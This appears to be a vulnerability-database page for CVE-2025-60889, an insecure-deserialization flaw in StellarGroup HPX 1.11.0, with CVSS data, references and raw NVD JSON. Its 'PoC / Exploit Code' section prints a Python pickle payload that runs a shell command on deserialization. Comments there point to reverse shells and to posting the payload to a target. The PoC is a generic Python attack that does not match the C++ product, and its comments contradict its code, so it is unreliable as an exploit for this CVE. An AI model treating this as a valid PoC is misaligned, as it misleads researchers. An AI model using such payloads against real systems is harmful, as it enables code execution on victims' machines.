CVE-2025-60889

Description

Insecure deserialization of untrusted input in StellarGroup HPX 1.11.0 under certain conditions may allow attackers to execute arbitrary code or other unspecified impacts.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:stellar-group:hpx:*:*:*:*:*:*:*:* - VULNERABLE

StellarGroup HPX 1.11.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# This is a conceptual PoC for an Insecure Deserialization vulnerability.
# The actual payload depends on the serialization format used by HPX (e.g., Cereal, Boost).

import pickle
import os

class MaliciousPayload:
    def __reduce__(self):
        # This will execute 'id' when deserialized (Proof of Concept)
        # In a real attack, this would be a reverse shell or malicious command
        return (os.system, ('whoami',))

# Serialize the malicious object
malicious_data = pickle.dumps(MaliciousPayload())

print(f"Generated Malicious Payload: {malicious_data}")

# In a real scenario, send this payload to the vulnerable HPX endpoint.
# Example: requests.post('http://target:port/vulnerable_endpoint', data=malicious_data)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60889
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60889
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60889/
[4] VulDB https://vuldb.com/cve/CVE-2025-60889
[5] http://hpx.com
[6] http://stellargroup.com
[7] https://gist.github.com/TrebledJ/b32fd5c469583493ab50244045c9a6e4
[8] https://gist.github.com/TrebledJ/b32fd5c469583493ab50244045c9a6e4

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60889", "sourceIdentifier": "[email protected]", "published": "2026-04-28T16:16:05.763", "lastModified": "2026-05-18T18:23:32.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure deserialization of untrusted input in StellarGroup HPX 1.11.0 under certain conditions may allow attackers to execute arbitrary code or other unspecified impacts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:stellar-group:hpx:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.11.0", "matchCriteriaId": "14B3F575-203C-42B4-8615-4DA5AB61306A"}]}]}], "references": [{"url": "http://hpx.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "http://stellargroup.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://gist.github.com/TrebledJ/b32fd5c469583493ab50244045c9a6e4", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/TrebledJ/b32fd5c469583493ab50244045c9a6e4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}